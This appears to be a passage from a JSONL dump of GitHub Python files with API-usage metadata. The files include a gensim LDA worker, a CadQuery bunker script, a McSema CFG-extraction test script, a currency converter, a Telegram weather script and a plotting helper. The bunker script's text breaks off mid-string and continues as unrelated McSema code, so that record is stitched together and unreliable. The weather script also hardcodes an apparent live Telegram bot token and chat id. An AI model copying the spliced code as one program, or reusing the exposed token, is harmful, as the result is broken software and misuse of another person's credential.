"PyQt5.QtWidgets.QMessageBox", "line_number": 854, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 854, "usage_type": "name"}, {"api_name": "sequencemanager.load_all_sequences", "line_number": 868, "usage_type": "call"}, {"api_name": "settings.settings", "line_number": 868, "usage_type": "argument"}, {"api_name": "sequence.EditSamplesDialog", "line_number": 869, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 876, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 876, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 876, 
"usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 877, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 877, "usage_type": "name"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 879, "usage_type": "argument"}, {"api_name": "alignment.AlignmentDialog", "line_number": 903, "usage_type": "call"}, {"api_name": "sequence.ContactTreeItem", "line_number": 925, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 993, "usage_type": "call"}, {"api_name": "math.isfinite", "line_number": 995, "usage_type": "call"}, {"api_name": "core.position.Position", "line_number": 1004, "usage_type": "call"}, {"api_name": "core.position.Position", "line_number": 1005, "usage_type": "call"}]}
+{"seq_id": "38637132431", "text": "from __future__ import with_statement\nimport os\nimport sys\nimport logging\nimport threading\nimport tempfile\nimport argparse\n\ntry:\n import Queue\nexcept ImportError:\n import queue as Queue\nimport Pyro4\nfrom gensim.models import ldamodel\nfrom gensim import utils\n\nlogger = logging.getLogger('gensim.models.lda_worker')\n\n\n# periodically save intermediate models after every SAVE_DEBUG updates (0 for never)\nSAVE_DEBUG = 0\n\nLDA_WORKER_PREFIX = 'gensim.lda_worker'\n\n\nclass Worker(object):\n def __init__(self):\n self.model = None\n\n @Pyro4.expose\n def initialize(self, myid, dispatcher, **model_params):\n self.lock_update = threading.Lock()\n self.jobsdone = 0 # how many jobs has this worker completed?\n # id of this worker in the dispatcher; just a convenience var for easy access/logging TODO remove?\n self.myid = myid\n self.dispatcher = dispatcher\n self.finished = False\n logger.info(\"initializing worker #%s\", myid)\n self.model = ldamodel.LdaModel(**model_params)\n\n @Pyro4.expose\n @Pyro4.oneway\n def requestjob(self):\n \"\"\"\n Request jobs from the dispatcher, in a perpetual loop until `getstate()` is called.\n \"\"\"\n if self.model is None:\n raise RuntimeError(\"worker must be initialized before receiving jobs\")\n\n job = None\n while job is None and not self.finished:\n try:\n job = self.dispatcher.getjob(self.myid)\n except Queue.Empty:\n # no new job: try again, unless we're finished with all work\n continue\n if job is not None:\n logger.info(\"worker #%s received job #%i\", self.myid, self.jobsdone)\n self.processjob(job)\n self.dispatcher.jobdone(self.myid)\n else:\n logger.info(\"worker #%i stopping asking for jobs\", self.myid)\n\n @utils.synchronous('lock_update')\n def processjob(self, job):\n logger.debug(\"starting to process job #%i\", self.jobsdone)\n self.model.do_estep(job)\n self.jobsdone += 1\n if SAVE_DEBUG and self.jobsdone % SAVE_DEBUG == 0:\n fname = os.path.join(tempfile.gettempdir(), 'lda_worker.pkl')\n self.model.save(fname)\n logger.info(\"finished processing job #%i\", self.jobsdone - 1)\n\n @Pyro4.expose\n def ping(self):\n return True\n\n @Pyro4.expose\n @utils.synchronous('lock_update')\n def getstate(self):\n logger.info(\"worker #%i returning its state after %s jobs\", self.myid, self.jobsdone)\n result = self.model.state\n assert isinstance(result, ldamodel.LdaState)\n self.model.clear() # free up mem in-between two EM cycles\n self.finished = True\n return result\n\n @Pyro4.expose\n @utils.synchronous('lock_update')\n def reset(self, state):\n assert state is not None\n logger.info(\"resetting worker #%i\", self.myid)\n self.model.state = state\n self.model.sync_state()\n self.model.state.reset()\n self.finished = False\n\n @Pyro4.oneway\n def exit(self):\n logger.info(\"terminating worker #%i\", self.myid)\n os._exit(0)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"--host\", help=\"Nameserver hostname (default: %(default)s)\", default=None)\n parser.add_argument(\"--port\", help=\"Nameserver port (default: %(default)s)\", default=None, type=int)\n parser.add_argument(\n \"--no-broadcast\", help=\"Disable broadcast (default: %(default)s)\", action='store_const',\n default=True, const=False\n )\n parser.add_argument(\"--hmac\", help=\"Nameserver hmac key (default: %(default)s)\", default=None)\n parser.add_argument(\n '-v', '--verbose', help='Verbose flag', action='store_const', dest=\"loglevel\",\n const=logging.INFO, 
default=logging.WARNING\n )\n args = parser.parse_args()\n\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=args.loglevel)\n logger.info(\"running %s\", \" \".join(sys.argv))\n\n ns_conf = {\n \"broadcast\": args.no_broadcast,\n \"host\": args.host,\n \"port\": args.port,\n \"hmac_key\": args.hmac\n }\n utils.pyro_daemon(LDA_WORKER_PREFIX, Worker(), random_suffix=True, ns_conf=ns_conf)\n logger.info(\"finished running %s\", \" \".join(sys.argv))\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "alex-tifrea/poincare_glove", "sub_path": "gensim/models/lda_worker.py", "file_name": "lda_worker.py", "file_ext": "py", "file_size_in_byte": 4395, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 81, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.models.ldamodel.LdaModel", "line_number": 39, "usage_type": "call"}, {"api_name": "gensim.models.ldamodel", "line_number": 39, "usage_type": "name"}, {"api_name": "Pyro4.expose", "line_number": 30, "usage_type": "attribute"}, {"api_name": "queue.Empty", "line_number": 54, "usage_type": "attribute"}, {"api_name": "Pyro4.expose", "line_number": 41, "usage_type": "attribute"}, {"api_name": "Pyro4.oneway", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 70, "usage_type": "call"}, {"api_name": "gensim.utils.synchronous", "line_number": 64, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 64, "usage_type": "name"}, {"api_name": "Pyro4.expose", "line_number": 74, "usage_type": "attribute"}, {"api_name": "gensim.models.ldamodel.LdaState", "line_number": 83, "usage_type": "attribute"}, {"api_name": "gensim.models.ldamodel", "line_number": 83, "usage_type": "name"}, {"api_name": "Pyro4.expose", "line_number": 78, "usage_type": "attribute"}, {"api_name": "gensim.utils.synchronous", "line_number": 79, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 79, "usage_type": "name"}, {"api_name": "Pyro4.expose", "line_number": 88, "usage_type": "attribute"}, {"api_name": "gensim.utils.synchronous", "line_number": 89, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 89, "usage_type": "name"}, {"api_name": "os._exit", "line_number": 101, "usage_type": "call"}, {"api_name": "Pyro4.oneway", "line_number": 98, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 105, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 115, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 115, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 120, "usage_type": "attribute"}, {"api_name": "gensim.utils.pyro_daemon", "line_number": 128, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 128, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 129, "usage_type": "attribute"}]}
+{"seq_id": "29466941242", "text": "import cadquery as cq\nfrom skirmishbunker import Bunker, SplitDoor\nfrom cqterrain import tile\nfrom cadqueryhelper import shape\n\ndef custom_star_tile(bunker):\n star_tile = tile.star(\n length = bunker.floor_tile_size,\n width = bunker.floor_tile_size,\n height = bunker.floor_tile_height,\n points = 4,\n outer_radius = bunker.floor_tile_size/2,\n inner_radius = 2,\n padding = .5\n )\n return star_tile\n\ndef custom_windmill_tile(bunker):\n windmill_tile = tile.windmill(\n tile_size = bunker.floor_tile_size,\n height = bunker.floor_tile_height,\n padding = .5\n )\n return windmill_tile\n\ndef custom_cut_door(bunker):\n height = bunker.height\n p_length = bunker.panel_length\n p_width = bunker.panel_width\n padding = bunker.panel_padding\n door_cut_width = bunker.inset+bunker.wall_width\n\n padding_top = 3.2\n\n if bunker.inset<0:\n door_cut_width = -1*(bunker.inset)+bunker.wall_width\n\n cut = (\n shape.arch_pointed(24, door_cut_width, 49, 27.3)\n .translate((0,-0,-3))\n )\n\n cut = shape.arch_pointed(\n p_length - bunker.inner_arch_sides,\n door_cut_width,\n height - padding - bunker.inner_arch_top - bunker.wall_width+1 -padding_top,\n ((height - padding)/2) + bunker.arch_inner_height - bunker.inner_arch_sides - bunker.wall_width+1 - padding_top\n ).translate((0,0,-4 + bunker.wall_width /2 - padding_top / 2))\n\n return cut\n\ndef custom_door(bunker):\n height = bunker.height\n p_length = bunker.panel_length\n padding = bunker.panel_padding\n padding_top = 3.2\n\n bp = SplitDoor()\n bp.length = p_length - bunker.inner_arch_sides\n bp.height = height - padding - bunker.inner_arch_top - bunker.wall_width+1 -padding_top\n bp.width = 1\n bp.base_height = ((height - padding)/2) + bunker.arch_inner_height - bunker.inner_arch_sides - bunker.wall_width+1 - padding_top\n bp.open = 6\n bp.make()\n door = bp.build()\n #return door.translate((0,0,0))\n return door.translate((0,-1,-4 + bunker.wall_width /2 - padding_top / 2))\n\n\nbp = Bunker()\nbp.inset=0\nbp.width=75\nbp.length=75\nbp.height=65\nbp.wall_width =6\n\nbp.render_panel_details=True\nbp.panel_length=28\nbp.panel_width = 5\nbp.panel_padding = 4\n\nbp.render_windows=True\nbp.skip_windows = []\nbp.window_length = 8\nbp.window_height = 24\nbp.window_frame_chamfer = 1.6\nbp.window_frame_chamfer_select = \" Creating directory: \" + path)\n try:\n os.makedirs(path)\n except:\n print(\"[Error] could not create directory \" + path)\n\n\ndef is_batch_dir_sane(batch_name):\n for filename in os.listdir(batch_name):\n name, extension = os.path.splitext(filename)\n\n fullname = os.path.join(batch_name, filename)\n if ((os.path.isfile(fullname) and extension != \".cfg\") or \\\n (os.path.isdir(fullname) and filename != log_dir_name)):\n return False\n return True\n\ndef is_valid_binary(binary_name):\n bin_path = os.path.join(bin_dir, binary_name)\n return os.path.isfile(bin_path)\n\n# Return (list of filtered names, number of files that are missing)\ndef get_binaries_from_tags(desired):\n binaries = []\n missing = 0\n\n # We want to get cfg for everything\n get_all = ALL_TAG in desired\n\n bin2tag = util.get_bin2tags(tags_dir)\n\n for binary, tags in bin2tag.items():\n if get_all or any(x in desired for x in tags):\n if not is_valid_binary(binary):\n print(colors.bg_yellow(\n \" > Skipping \" + binary+ \" : file missing\"))\n missing = missing + 1\n else:\n print(\" > Selecting \" + binary)\n binaries.append(binary)\n\n return (binaries, missing)\n\ndef create_batch_dir(batch, policy):\n batch_name = batch + 
\"_cfg\"\n if batch_name not in os.listdir():\n print(\" > Batch name is unique\")\n make_dir(batch_name)\n make_dir(os.path.join(batch_name, log_dir_name))\n return batch_name\n\n print(\" > Batch with same name already exists\")\n print(\" > Selected policy is \" + policy)\n\n if policy == \"D\":\n print(\" > Removing old batch\")\n if is_batch_dir_sane(batch_name):\n shutil.rmtree(batch_name)\n make_dir(batch_name)\n make_dir(os.path.join(batch_name, log_dir_name))\n else:\n print(\" > Batch folder is not sane, remove manually\")\n sys.exit(1)\n return batch_name\n\n# From lift_program.py\ndef binary_libraries(binary):\n try:\n res = subprocess.check_output(['ldd', binary]).decode()\n except:\n print(\" \\t[W] ldd failed for \" + binary)\n return\n\n for line in res.split(\"\\n\"):\n if \"=>\" not in line:\n continue\n name, path_and_addr = line.split(\" => \")\n path_and_addr = path_and_addr.strip(\" \")\n if not path_and_addr.startswith(\"/\"):\n continue\n\n lib = \" \".join(path_and_addr.split(\" \")[:-1])\n lib = os.path.realpath(lib)\n\n if os.path.isfile(lib):\n yield name.strip(), lib\n\n\ndef update_shared_libraries(binary):\n if not os.path.isdir(so_dir):\n print(\" > Creating \" + so_dir)\n os.mkdir(so_dir)\n\n for name, path in binary_libraries(binary):\n if name in os.listdir(so_dir):\n continue\n\n sym_name = os.path.join(so_dir, name)\n\n try:\n print(\" \\t> \" + sym_name + \" => \" + path)\n os.symlink(path, sym_name)\n except:\n pass\n\n# From lift_program.py\n# Most likely there will be only x86-64 binaries for the time being,\n# but it won't hurt to have it in place once we decide to add another tests\ndef binary_info(binary):\n res = subprocess.check_output(['file', binary]).decode()\n is_pie = 'LSB shared object' in res or 'Mach-O 64' in res or 'LSB pie executable' in res\n address_size = 64\n\n if 'aarch64' in res:\n arch = 'aarch64'\n elif 'x86-64' in res or 'x86_64' in res:\n arch = 'amd64_avx'\n elif 'x86' in res:\n arch = 'x86_avx'\n address_size = 32\n else:\n raise Exception(\"Unknown architecture for file type {}\".format(res))\n\n return address_size, arch, is_pie\n\n\ndef dyninst_frontend(binary, cfg, args, log_file):\n address_size, arch, is_pie = binary_info(binary)\n\n disass_args = [\n \"mcsema-dyninst-disass\",\n \"--arch\", arch,\n # TODO: Portability\n \"--os\", \"linux\",\n \"--binary\", quote(binary),\n \"--output\", quote(cfg),\n \"--entrypoint\", \"main\",\n \"--std_defs\", args.std_defs ]\n\n if is_pie:\n disass_args.append(\"--pie_mode\")\n # TODO: May not be needed\n disass_args.append(\"true\")\n\n # TODO: This is too verbose for normal output\n #print(\" \\t> \" + \" \".join(disass_args))\n\n ret = subprocess.call(disass_args)\n if ret:\n return FAIL\n return SUCCESS\n\n# TODO: Testing REQUIRED\ndef ida_frontend(binary, cfg, args, log_file):\n address_size, arch, is_pie = binary_info(binary)\n\n disass_args = [\n 'mcsema-disass',\n '--arch', arch,\n '--os', 'linux',\n '--binary', quote(binary),\n '--output', quote(cfg),\n '--entrypoint', 'main',\n '--log_file', log_file,\n '--disassembler', args.path_to_disass]\n\n if is_pie:\n disass_args.append(\"--pie_mode\")\n\n print(\" \\t> \" + \" \".join(disass_args))\n ret = subprocess.call(disass_args)\n if ret:\n return FAIL\n return SUCCESS\n\ndef binja_frontend(binary, cfg, args, log_file):\n print(\" > Not implemented\")\n sys.exit(1)\n\n\n# TODO: We may want for each file to be lifted in separate directory and on a copy\n# (in the case frontend is broken and modifies the original 
itself)\ndef get_cfg(*t_args, **kwargs):\n todo, args, lifter, result = t_args\n\n while not todo.empty():\n\n try:\n binary, cfg = todo.get()\n except queue.Empty:\n return\n\n bin_path = os.path.join(bin_dir, binary)\n\n print(\"\\n > Processing \" + bin_path)\n update_shared_libraries(bin_path)\n\n log_file = os.path.join(args.batch + \"_cfg\", log_dir_name, binary + \".log\")\n result[binary] = lifter(bin_path, cfg, args, log_file)\n\n# TODO: Handle other frontends\ndef get_lifter(disass):\n if disass == \"dyninst\":\n return dyninst_frontend\n if disass == \"ida\":\n return ida_frontend\n print(\" > Support for the chosen frontend has not been implemented yet!\")\n sys.exit(1)\n\ndef print_result(result, missing):\n print(\"\\nResults:\")\n stat = dict()\n for key, val in sorted(result.items(), key=operator.itemgetter(0)):\n print(key.ljust(30).rjust(30 + INDENT) + colors.get_bin_result(val) +\n (MESSAGES[val]).rjust(5) + colors.clean())\n if val in stat:\n stat[val] += 1\n else:\n stat[val] = 1\n print(\"\\nTotal:\")\n for key, val in MESSAGES.items():\n print(val)\n if key not in stat:\n print(\" \" * INDENT, str(0))\n else:\n print(\" \" * INDENT, stat[key])\n print(\"\\nMissing:\")\n print(\" \" * INDENT, missing)\n\ndef main():\n arg_parser = argparse.ArgumentParser()\n\n arg_parser.add_argument(\n \"--disass\",\n help='Frontend to be used: ida | binja | dyninst',\n choices=[\"ida\", \"binja\", \"dyninst\"],\n required=True)\n\n arg_parser.add_argument(\n \"--path_to_disass\",\n help=\"Path to disassembler, needed in case ida is chosen as frontend\",\n default=None,\n required=False)\n\n arg_parser.add_argument(\n \"--tags\",\n help=\"Flavors to be lifted\",\n nargs=\"+\",\n required=True)\n\n arg_parser.add_argument(\n \"--dry_run\",\n help=\"Should actual commands be executed?\",\n default=False,\n required=False)\n\n arg_parser.add_argument(\n \"--batch\",\n help=\"Specify batch name\",\n required=True)\n arg_parser.add_argument(\n \"--batch_policy\",\n choices=[\"D\", \"U\", \"C\"],\n help=\"How to resolve already existing batch\\n D: delete all old cfgs\\nU: Update all\\nC: create only missing\",\n default=\"D\",\n required=False)\n\n arg_parser.add_argument(\n \"--std_defs\",\n help=\"In case frontend still supports/needs it, can be found with McSema sources\",\n default=\"../../tools/mcsema_disass/defs/linux.txt\",\n required=False)\n\n arg_parser.add_argument(\n '--jobs',\n help = \"Number of threads to use\",\n default = 1,\n required = False)\n\n args, command_args = arg_parser.parse_known_args()\n\n\n if args.disass == \"ida\":\n if args.path_to_disass is None:\n print(\"IDA frontend is selected but --path_to_disass is not set\")\n sys.exit(1)\n if not os.path.isfile(args.path_to_disass):\n print(\"IDA frontend is selected but --path_to_disass is not a file\")\n sys.exit(1)\n\n print(\"Checking batch name\")\n batch_dir = create_batch_dir(args.batch, args.batch_policy)\n\n print(\"Select all binaries, specified by tags\")\n binaries, missing = get_binaries_from_tags(args.tags)\n\n result = dict()\n print(\"\\nIterating over binaries\")\n\n todo = queue.Queue()\n\n for b in binaries:\n cfg = os.path.join(batch_dir, b + \".cfg\")\n if args.batch_policy == \"C\" and os.path.isfile(cfg):\n print(\" \\t> \" + cfg + \" is already present, not updating\")\n result[b] = IGNORED\n else:\n todo.put((b, cfg))\n\n threads = []\n for i in range(int(args.jobs)):\n t = threading.Thread(\n target=get_cfg, args=(todo, args, get_lifter(args.disass), result))\n t.start()\n threads.append(t)\n\n for t 
in threads:\n t.join()\n\n print_result(result, missing)\n\n return 0\n\nif __name__ == '__main__':\n main()\n", "repo_name": "lifting-bits/mcsema", "sub_path": "tests/integration_tests/get_cfg.py", "file_name": "get_cfg.py", "file_ext": "py", "file_size_in_byte": 9803, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2539, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.makedirs", "line_number": 34, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "util.get_bin2tags", "line_number": 61, "usage_type": "call"}, {"api_name": "colors.bg_yellow", "line_number": 66, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 94, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 123, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.symlink", "line_number": 133, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 141, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 166, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 167, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 179, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 192, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 193, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 202, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 209, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 221, 
"usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 239, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 244, "usage_type": "call"}, {"api_name": "colors.get_bin_result", "line_number": 245, "usage_type": "call"}, {"api_name": "colors.clean", "line_number": 246, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 262, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 317, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 320, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 331, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 334, "usage_type": "call"}, {"api_name": "os.path", "line_number": 334, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 343, "usage_type": "call"}]}
+{"seq_id": "33850202011", "text": "import requests\nimport json\nfrom config import keys\n\n\nclass ConvertException(Exception):\n pass \n\nclass CryptoConvertor:\n \n @staticmethod\n def convert(quote: str, base: str, amount: str):\n \n if quote == base:\n raise ConvertException(f'Невозможно перевести одинаковые валюты {base}.')\n\n try:\n quote_ticker = keys[quote]\n except KeyError:\n raise ConvertException(f'Не удалось обработать валюту {quote}.')\n\n try:\n base_ticker = keys[base]\n except KeyError:\n raise ConvertException(f'Не удалось обработать валюту {base}.')\n\n try:\n amount = float(amount)\n except ValueError:\n raise ConvertException(f'Не удалось обработать количество {amount}.')\n ruble_json = requests.get(f'https://api.exchangeratesapi.io/latest?symbols=RUB')\n #print(ruble_json)\n dollar_json = requests.get(f'https://api.exchangeratesapi.io/latest?symbols=USD')\n ruble_rate = float(json.loads(ruble_json.content)['rates']['RUB'])\n dollar_rate = float(json.loads(dollar_json.content)['rates']['USD'])\n if base_ticker == \"EUR\":\n if quote_ticker == \"RUB\":\n return round((1 / ruble_rate) * float(amount), 1)\n if quote_ticker == \"USD\":\n return round((1 / dollar_rate) * float(amount), 1)\n if base_ticker == \"USD\":\n if quote_ticker == \"EUR\":\n return round(dollar_rate * float(amount), 2)\n if quote_ticker == \"RUB\":\n return round(((dollar_rate/ruble_rate) * float(amount)), 2)\n \n if base_ticker == \"RUB\":\n if quote_ticker == \"EUR\":\n return round(ruble_rate * float(amount), 2)\n if quote_ticker == \"USD\":\n return round(((ruble_rate/dollar_rate) * float(amount)), 2)\n \n \n", "repo_name": "isokolov/qap_telegrambot", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "config.keys", "line_number": 18, "usage_type": "name"}, {"api_name": "config.keys", "line_number": 23, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "38579004117", "text": "import requests\n\nbot = '5699740380:AAH8f6hNtBnCs_-fqN9e7WOB94FNBgkwJdA'\ncity = input('Введите название города: ')\nurl_text = f'https://wttr.in/{city}?M'\nurl_png = f'https://wttr.in/{city}_0pM.png'\n\nprint(requests.get(url_text).text)\n\nwith open(r'C:\\Users\\Roman\\Desktop\\GEEK\\Block_2\\Phyton\\DZ\\DZ_9\\Task_4\\imag.png', 'wb') as file:\n file.write(requests.get(url_png).content)\n \nrequests.get(f'https://api.telegram.org/bot{bot}/sendPhoto', params = dict(chat_id = '864101142'), files = {'photo': open('imag.png', 'rb')})", "repo_name": "RomanBusygin/Sem_Python", "sub_path": "DZ_9/Task_4/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 543, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "70582887768", "text": "# function to plot a matrix of activations: regions x task conditions\nimport matplotlib.colors as colors\nimport matplotlib as mpl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndef plotActivations(activations, title, functional_networks=True, no_ylabel=False, network_color_bar=False):\n\n # for the weights colorbar: red positive, blue negative\n v_min = np.min(activations)\n v_max = np.max(activations)\n v_mid = 0\n # define the figure and the axes\n fig,ax = plt.subplots()\n \n # to plot regions ordered by networks\n # Glasser 360 cortex parcellation ordered into functional networks reported in Ji et al., (2019)\n # path where the network file is: it contains labels (first column) and order (second column) \n #current_dir = os.getcwd()\n #net_file_path = f'{current_dir}/aux_files/networks_labels.txt'\n net_file_path = 'networks_labels.txt'\n net_file = np.loadtxt(net_file_path,delimiter=',')\n \n \n if functional_networks == True:\n # to assign each of the 360 nodes to its corresponding network\n # make as integer and subtract 1, so the indices start in 0, as Python requires.\n net_order = net_file[:,1].astype(int) - 1\n \n elif functional_networks == False:\n # no order by networks. keep the order of the dataset\n net_order = np.arange(activations.shape[0])\n \n # plot the data\n img = ax.imshow(activations[net_order,:],\n origin = 'upper',\n cmap='seismic',\n alpha = 1,\n clim=(v_min, v_max), \n norm=MidpointNormalize(midpoint=v_mid,vmin=v_min, vmax=v_max),\n aspect='auto',\n interpolation='none'\n )\n plt.title(title,fontsize=18)\n \n task_conditions = ['EMOTION:fear','EMOTION:neut','GAMBLING:win','GAMBLING:loss','LANGUAGE:story','LANGUAGE:math',\n 'MOTOR:cue','MOTOR:lf','MOTOR:rf','MOTOR:lh','MOTOR:rh','MOTOR:t','REASONING:rel',\n 'REASONING:match','SOCIAL:mental','SOCIAL:rnd','WM 0bk:body','WM 0bk:faces','WM 0bk:places',\n 'WM 0bk:tools','WM 2bk:body','WM 2bk:faces','WM 2bk:places','WM 2bk:tools']\n \n plt.xticks(np.arange(24),labels=task_conditions,rotation=90)\n ax.tick_params(labelsize=11,length=0.01)\n # axes ticks labels\n a = np.round(activations.shape[0]/2).astype(int)\n b = np.round(activations.shape[0])\n # plt.xticks([1,a,b])\n plt.yticks([1,a,b])\n plt.ylabel('360 Regions\\n (12 networks)',fontsize=15)\n # labels font size and length of the ticks\n # Thickness of the connectivity matrix border\n for axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(0)\n # properties of the weights colorbar\n cbar = plt.colorbar(img,pad=0.01)\n cbar.ax.tick_params(labelsize=13)\n cbar.outline.set_linewidth(0)\n \n if no_ylabel == True:\n plt.yticks([])\n plt.ylabel('')\n \n if network_color_bar == True:\n network_palette = ['royalblue','slateblue','paleturquoise','darkorchid','limegreen',\n 'lightseagreen','yellow','orchid','r','peru','orange','olivedrab']\n network_palette = np.asarray(network_palette)\n #define the colormap as an independent graphical object\n cmap = mpl.colors.ListedColormap(network_palette)\n #number of nodes (size) in each of the 12 networks\n size_networks=[]\n #path where the network file is: it contains labels (first column) and order (second column)\n net_labels = net_file[:,0].astype(int)\n #loop through all the labels: 1 to 12 to count the number of nodes\n for i in range(np.max(net_labels)):\n size_networks.append(np.sum(net_labels==i+1))\n #the bounds of the bar are the cumulative sum for each network size starting at zero: \n #ie, 0, 6, 6+54, 6+54+39, etc...\n su = 0\n #the first 
element of the networks bar bounds is zero\n        bounds = [0]\n        #this loop makes the cumulative sums\n        for i in range(np.max(net_labels)):\n            su += size_networks[i]\n            bounds.append(su)\n        #define the size of the color blocks according to the bounds (i.e. the number of nodes)\n        norm = mpl.colors.BoundaryNorm(bounds, cmap.N)\n\n        #get the size and position of the connectivity matrix as a reference \n        #to position the networks color bars\n        l, b, w, h = ax.get_position().bounds\n\n        ax2 = fig.add_axes([l/1.105,b,w/25,h])\n\n        cbNet = mpl.colorbar.ColorbarBase(ax2, cmap=cmap,\n                                          norm=norm,\n                                          spacing='proportional',\n                                          orientation='vertical')\n        cbNet.outline.set_linewidth(0)\n        cbNet.set_ticks([])\n        cbNet.ax.invert_yaxis() \n        #flip the colorbar so it follows the network order\n        ax.tick_params(axis='y',labelsize=14,pad=18,length=0.01)\n    \n    \n\nclass MidpointNormalize(colors.Normalize):\n    \"\"\"\n    Normalise the colorbar so that diverging bars work their way either side from a prescribed midpoint value\n    e.g. im=ax1.imshow(array, 